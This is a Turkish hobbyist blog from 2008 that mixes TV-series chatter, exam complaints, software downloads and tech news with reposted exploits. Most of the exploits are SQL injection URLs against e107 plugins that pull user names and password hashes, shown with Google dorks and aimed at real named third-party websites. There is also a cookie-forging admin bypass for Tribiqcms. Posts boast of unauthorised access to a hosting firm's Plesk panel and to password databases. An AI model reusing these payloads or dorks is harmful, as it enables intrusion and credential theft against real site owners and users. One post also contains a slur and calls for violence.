"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

31 Ekim 2008 Cuma

Tribiqcms 5.0.9a (beta) Insecure Cookie Handling Vulnerability

Tribiqcms 5.0.9a (beta) Insecure Cookie Handling Vulnerability

Discovered By: ZoRLu

code:

setcookie ("COOKIE_LAST_ADMIN_USER", $newAdmin["username"], time()+8640000, '/');
setcookie ("COOKIE_LAST_ADMIN_LANG", $newAdmin["use_language_id"], time()+8640000, '/');


Exploit:

javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=real_admin_name; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/";

example for my localhost:

javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=zorlu; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/";

kaynak: http://www.milw0rm.com/exploits/6886

e107 Plugin lyrics_menu (lyrics_song.php l_id) SQL Injection Vulnerability

e107 Plugin lyrics_menu (lyrics_song.php l_id) SQL Injection Vulnerability

author: ZoRLu

dork: allinurl:"lyrics_menu/lyrics_song.php?l_id="

exploit:

http://localhost/script_path/lyrics_song.php?l_id=[SQL1] or [SQL2]

[SQL1] = column number 15

-1+union+select+1,concat(user_name,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+e107_user--

example 1:

http://www.mirage.org/e107_plugins/lyrics_menu/lyrics_song.php?l_id=-1+union+select+1,concat(user_name,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15++from+e107_user--

[SQL2] = column number 17

-1+union+select+1,2,3,concat(user(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17--

example 2:

http://www.reklamadatbazis.hu/e107_plugins/lyrics_menu/lyrics_song.php?l_id=-1+union+select+1,2,3,concat(user(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17--

kaynak: http://www.milw0rm.com/exploits/6885

a.q Kurtlar Vadisi

bir hafta zor sabrediyoruz birde bakıyoruz ki bu hafta bölüm yayınlanmayacak hay sizin yayın akışı anlayışınıza sokam doğru dürüst iş yapın :@

30 Ekim 2008 Perşembe

cookie editor

işinize muhakkak yarar.

link 1: COOKi EDiTOR SiTESi



link 2: RAPiD

28 Ekim 2008 Salı

e107 Plugin BLOG Engine 2.1.4 Remote SQL Injection Vulnerability

e107 Plugin BLOG Engine 2.1.4 Remote SQL Injection Vulnerability

author: ZoRLu

dork: allinurl:"macgurublog.php?uid="

exploit:

http://localhost/script_path/macgurublog.php?uid=[SQL]

[SQL]=

-1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/*

example:

http://www.dmchat.org.uk/e107_plugins/macgurublog_menu/macgurublog.php?uid=-1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/*

Kaynak: http://www.milw0rm.com/exploits/6856

blogspot kapandı

a.q neye elimizi attıysak kuruttuk :) ownspace kapandı simdi de blogspot kapandı. şükür tekrar açıldı :) neyse tekrar hayırlı olsun

23 Ekim 2008 Perşembe

MoonStar Mtu Sözlük

ingilizce Türkçe çeviri sözlüğü işinize yarayacaktır.

TIKLA iNDiR

Kurtlar Vadisi Pusu 44. bölüm fragman

polat bu sefer kaçmayı başarıyor heralde. iskenderinde yavaş yavaş suyu ısınıyor :)

TIKLA iNDiR


Kaynak: http://www.dailymotion.com/

21 Ekim 2008 Salı

kpss start aldı :(

a.q kpss çıktı bide. işi gücü bıraktık sınavlara hazırlanıyoruz. ı hop ( umarım ) mutlu sonla biter kpss macerası :(

19 Ekim 2008 Pazar

Folder Lock 6.0.1


Folder Lock yazılımı ile sabit sürücünüzdeki tüm klasörlere, dosyalara, resimlere, dökümanlara ve aklınıza gelebilecek her türlü dosyaya kilit koyabilirsiniz. İsterseniz yazılımın kendi oluşturduğu bir kasaya çok önemli dosyalarınızı atabilir ve insanların görmesini engelleyebilirsiniz. Yazılım şifreleme işlemini 2 saniyede yapacak kadar iddialı ve hızlı. Tek bir fare tıklaması ile şifreleme yapabilecek kadar da basit.

Dosyaları şifreleme işleminde DOS altından dahi açılmıyor, üstelik sistem kendiliğinden açılıp kapansa bile her seferinde kendiliğinden şifre koruması devreye giriyor. Hem flaş diskleri hemde disket sürücüsünü şifreleyebilme özelliği de bulunuyor. Desteklediği dosya formatları; FAT16, FAT32, NTFS, EFS.

TIKLA iNDiR



Kaynak: http://gaggateknohaber.blogspot.com/2008/10/folder-lock-601-2-mb-rs.html

18 Ekim 2008 Cumartesi

domain firmasının admin paneli


bugün sabaha karşı can sıkıntısından biraz hack ile uğraştım bir sitenin plesk paneline ulaştım daha doğrusu bir domain firmasının plesk paneline ulaştım baya site vardı :) resimdekiler sadece bunlardan bir kaçı...

17 Ekim 2008 Cuma

yazıyorum hamsi kokusu üzerimde :P


şimdi the_k@m!l hamsi yapmıştı toplandık off nasılda özlemiştim :) the_k@m!l bacanak ellerine sağlık. bi teşekkür yazısı yazayım dedim :)

15 Ekim 2008 Çarşamba

hay a.q kpss

bu sınav yüzünden artık nete fazla takılamıyorum. he takılmıyorumda ders mi çalışıyorum külliyen yalan :) daha ortam kpss ye hazırlanmak için müsait deil :)

Kurtlar vadisi 43. bölüm fragman - yeni bölüm

polata yaman dayat atıyorlar ağız göz birbirine girmiş :( memati bomba patlatacak heralde (yakışır mematime) :)

TIKLA iZLE




Kaynak: http://yeah28.wordpress.com

11 Ekim 2008 Cumartesi

bizimantalya.com

gecenlerde bizimantalya.com adlı sitede gezinirken küçük bi denem yaptım ve veritabanına kayıtlı kullanıcı adı ve sifreye ulaştım. Türk sitesi olduğu içinde zarar vermedim. site sahibine bildirim kendiside saolsun dikkate almış ve açığı kapatmış. işte mail:

milw0rm


bugün milw0rm.com a bir göz attım ve çok hoş birşeyle karşılaştım. milw0rmda Türk author sayısında artış var her nekadar bazıları bunu çekemiyor olsada bence bu çok hoş. inş zamanla milw0rm tamamen Türk author larla dolup taşacak.

10 Ekim 2008 Cuma

işte bir üniversitenin web sayfasında açık.


küçük bir araştırma ile sitede sql olduğunu farkettim ve veri tabanındaki sifrelere ulaştım. site yönetimine bildirdim umarım açığı kapatırlar.

Kurtlar Vadisi Sezona iyi Başladı

bence süper bir bölümdü. helal olsun polatıma duman etti ortalığı ;) gerçekten süperdi umarım hep böyle güzel devam eder epeydir böyle güzel bölümler çekilmiyordu. polat hasta rolünü iyi yapmış. küçük emrah gibiydi. hatırlamıyorum abi :)

8 Ekim 2008 Çarşamba

kurtlar vadisi fragman

perşembe günü yayınlanacak olan bölüm süper :) polat iskendere iyi bi kafa gömüyor detayları sizde izleyin görün ;)

TIKLA iZLE

7 Ekim 2008 Salı

Dersler başladı : )

öss yi kazanmış olmak yetmiyor üniversite yi bitirmekte yetmiyor biliyorsunuz birde kpss sınavı var yani zorlu bir sınav bunu kazanamadıkmı üniversite okumuş olmamızın hiç bir önemi yok :P gerçekten öyle. o yüzden pek sık nete giremiycem. dolayısıyla pek fazla makale yayınlayamayacağım. see you :)

4 Ekim 2008 Cumartesi

A.R.O.G Yakında

arog 5 aralıkta vizyona giriyormuş. hatta şimdiye kadar çoktan girecekti de sırf şahanın recep ivedik adlı filmi ile aynı zamanlara denk geldiğinden erteleme kararı almıştı. ( reyting kaygısı ). artık yayınlanma zamanının geldiğini düşündü heralde cem yılmaz ve daha fazla dayanamadı :) işte film fragmanı:

TIKLA iZLE

15 Şehit

dün gece yapılan şemdinli karakol baskınında 15 askerimiz şehit edilmiştir. 20 askerimiz yaralı ve iki askerimizden de haber alınamıyor. çatışmada 23 orospu çocuğu pkklı öldürülmüştür. diğerlerininde en yakın zamanda kökü kazınacaktır inşallah. şehit ailelerine baş sağlığı diliyorum. Allah rahmet eylesin.

2 Ekim 2008 Perşembe

Kurtlar Vadisi 9 Ekim'de başlıyor

kurtlar vadisinin 9 ekimde başlayacağına dair haberlerle karşılaşmaya başladım I hop ( umarım :) ) doğrudur. işte bir haber:

Yıllardır seyirciyi televizyon karşısına kilitleyen ve izlenme rekorları kıran Kurtlar Vadisi, sevenleriyle buluşmaya hazırlanıyor
Geçtiğimiz sezona nefesleri kesen bir finalle tatile giren Kurtlar Vadisi Pusu, 9 Ekim Perşembe akşamı yayınlanacak bölümüyle yeni sezona merhaba diyecek.

Dizinin resmi internet sitesi www.kurtlarvadisi.comdan www.kurtlarvadisi.com'dan yapılan açıklamada; Kurtlar Vadisi - Pusu dizisinin, Haziran ayındaki sezon finalinin devamındaki birçok sorunun yeni bölümlerde cevabını bulucağı bildirildi.

Dizinin yeni bölümlerindeki senaryosuyla ilgili ipuçlarının da verildiği açıklama şöyle: "İllegal yöntemlerle ülke yönetimini ele geçirmek isteyen güçler, yeni şartlar ve olayları kullanarak amaçları için çalışmaya devam edecek. Onları engellemeye çalışan Polat Alemdar'ın işi bu kez daha zor olacak. Çünkü hem ekibi kan kaybedecek hem de düşmanları taktik değiştirecek ve güç gösterilerinde daha acımasız olacak

Kaynak: http://www.haber10.com/haber/138533/

Zeka artıran şapka !


Bilim adamları, başa takıldığında beynin düşünme kapasitesini ve yaratıcılığını arttıran bir şapka geliştirdi.

Dustin Hoffman’ın Oscar ödüllü “Yağmur Adam” filminden esinlenen Avustralyalı bilim adamları, başa takıldığında beynin düşünme kapasitesini ve yaratıcılığını arttıran bir şapka geliştirdi.

Sydney Üniversitesi’nce üretilen “manyetik nabız” tekniğiyle çalışan şapka, beynin işleyiş biçimini değiştirebiliyor. Uzmanlara göre, beynin baskın olan sol yanı, ayrıntılara önem vermeyip olayları bir bütün olarak algılamaya yatkın. Sağ taraf da detayları yakalamaya çalışıyor ancak sol daha güçlü olduğu için topladığı bilgiler bilinçaltına itiliyor.

“Düşünen şapka” ise beynin fazla çalışan sol kısmının “kanalını” değiştirip daha yavaş çalışmasını ve sağ bölümün normalden daha aktif hale gelmesini sağlıyor.

Deneylerde şapkayı 15 dakika takan gönüllülerde bile sanatsal ve matematiksel becerilerin önemli bir oranda güçlendiği gözlemlendi. Ancak şapkanın etkisi henüz sadece bir saat sürüyor. İcat için daha önce depresyon ve şizofreni tedavisinde kullanılan beyni manyetik dalgalarla harekete geçirme tekniğinden faydalanıldı. Teknoloji kusursuz hale getirilirse şapka yeni fikirlerin üretilmesi için de kullanılabilir.

NASIL ÇALIŞIYOR?

1. İçinde eletrik akımına bağlanan sekiz şeklinde bir mıknatıs bulunan şapka başa yerleştiriliyor. Birbirine geçirilmiş bir deste telden oluşan mıknatıs sol kulağın yanına getiriliyor.

2. Çok küçük boyuttaki manyetik nabızlar, beynin detaylara önem vermeyen ve beynin sağ kısmını bastıran sol taraftaki elektrik akımının düzenini bozuyor.

3. Beynin sağ kısmı tarafından toplanan ve kişi farkında olmadan bilinçaltında saklanan ayrıntılar açığa çıkıyor. Yaratıcı ve çözümsel yetenekler güçleniyor.

Kaynak: http://www.veteknoloji.com/zeka-artiran-sapka--7478-.html

Google 10 yaşında


Google 10 yaşında
Dünyanın en değerli markası olan Google 10. yaşına bastı.

Google'cılar şimdiden gelecek on yılın teknolojik gelişmeleri ve bunların dünyaya olası etkisi üzerine kafa yormaya başladılar bile. 10. yıl için kapsamlı bir zaman çizelgesi hazırlayan Google, ilk günden bugüne kadar hayata geçirdikleri projeleri ve heyecan dolu serüvenini yansıtmış.

Google'ın önemli günler için tasarladığı 308 özel logo (Doodle) da 10. yıl özel bölümünde sergileniyor. 'Google'ı Nasıl Kullanıyorum' başlıklı özel bölümde kullanıcıların Goole ürünlerini kullanmada sayısız, ilginç yollar bulduğundan bahsedilerek bunlardan örnekler verilmiş.Kullanıcıların kendi buldukları kullanım kolaylıklarını paylaşmaya davet edildiği bölüm mutlaka gezilmeli.

Dünyayı değiştirecek fikirler için çağrı yapılan bölüm hayli ilginç. Sizin de Dünyayı değiştirecek bir fikriniz varsa 20 Ekime kadar Google'a gönderebilir bunun karşılığında da 10 milyon dolar kazanacak.

Google'ın açıklamasında, bu ödülün, "akıllı teknoloji aracılığıyla olağanüstü sonuçlar sağlayacak, küçük ölçekte başlayarak uzun dönemde büyük sonuçları olacak" 5 fikrin sahipleri arasında paylaştırılacağı belirtildi.

Açıklamada, fikirlerin Google'a sunulabileceği sürenin 20 Ekimde dolacağı kaydedildi.

Tüm fikirler arasından 100 tanesinin seçilerek 27 Ocak 2009'da açıklanacağı, daha sonra Google kullanıcılarının finale kalan 20 fikri belirleyeceği, Google'un oluşturacağı kurulun da kazanan 5 fikri seçeceği belirtildi.

15 Eylül 1997 tarihinde Larry Page ve Sergey Brin adlı Stanford Üniversitesi öğrencilerinin, ''google.com'' adının haklarını almalarıyla basit bir arama motoru olarak kurulan Google, kısa sürede internet üzerinden bilgiye ulaşmada en çok kullanılan arama motoru haline geldi.

http://www.google.com.tr/tenthbirthday/

1 Ekim 2008 Çarşamba

Dell Fabrikalarını Satıyor

Dell Fabrikalarını Satıyor


Perakende satışta üretim maliyetlerinin yüksek olduğuna karar veren Dell, bilgisayar ürettiği fabrikaları satışa çıkardı. Fabrikalar satılınca Dell ne yapacak?


Bir zamanlar doğrudan satış politikasıyla büyük sükse yapan Dell, bilgisayar piyasası gelişince rekabeti sürdürebilmek için mağazalarda perakende satışa geçmişti. Ancak son zamanlarda satışların artmasına rağmen kârlılığın (yüksek üretim maliyetleri nedeniyle) sürekli düşüş göstermesi, firmanın kendi bilgisayarlarını üretmekten vazgeçme kararı almasına neden oldu.

Fabrikalar Gidince Ne Olacak?

Önümüzdeki 18 ay içerisinde dünya genelindeki bilgisayar üretim fabrikalarını satmayı planlayan Dell, bu sayede yüksek maliyetlerden kurtulmayı hedefliyor. Satılan fabrikalara en muhtemel taliplerin ise Asyalı sözleşmeli bilgisayar üreticileri olduğu söyleniyor. Dell de fabrikaların satışı sonrasında büyük olasılıkla bilgisayarlarını bu üreticilerle anlaşarak yaptıracak.

Kaynak: http://www.bilisim-h.com/Gundem/dell-fabrikalarini-satiyor.html

Oyuncular İçin SideWinder X6

Oyuncular İçin SideWinder X6

Microsoft'un yeni klavyesi SideWinder X6, yeri değiştirilebilir tuş takımı sayesinde oyun deneyimini daha keyifli hale getirecek özellikler sunuyor.

Klavyenizde nümerik tuşların yer aldığı bölüm aynı zamanda programlanabilen kısayol tuşları olarak kullanılsa, üstelik bu tuşlar oyun oynarken klavyenin diğer tarafında yer alsa hoş olmaz mıydı? Bu düşünceyle hareket eden Microsoft Donanım, yeni SideWinder X6 klavye ve SideWinder X5 fare ikilisini Leipzig'de tanıttı.

Oyun Konforu İçin



Yeri değiştirilebilir tuş takımı sayesinde normal klavye konumunda sayısal tuş takımı olarak iş gören nümerik bölüm, oyun moduna geçildiğinde makro programlanabilecek bir bölüm haline geliyor. İki farklı oyun modu bulunan SideWinder X6 klavye, Cruise Control özelliği ile devasa haritalarda dolanmayı kolay hale getirerek, tuşa sürekli basılı tutmadan da belli hareketleri devam ettirmeyi sağlıyor.

Dokuz tuşlu SideWinder X5 fare ise, 2000 DPI izleme hassasiyeti, beş özelleştirilebilir tuş ve Windows Vista Oyun Gezgini'ne hızlı geçişi sağlayan Hızlı Başlat tuşu ile oyun performansını artırmak isteyen kullanıcılara hitap ediyor.

 
Dizi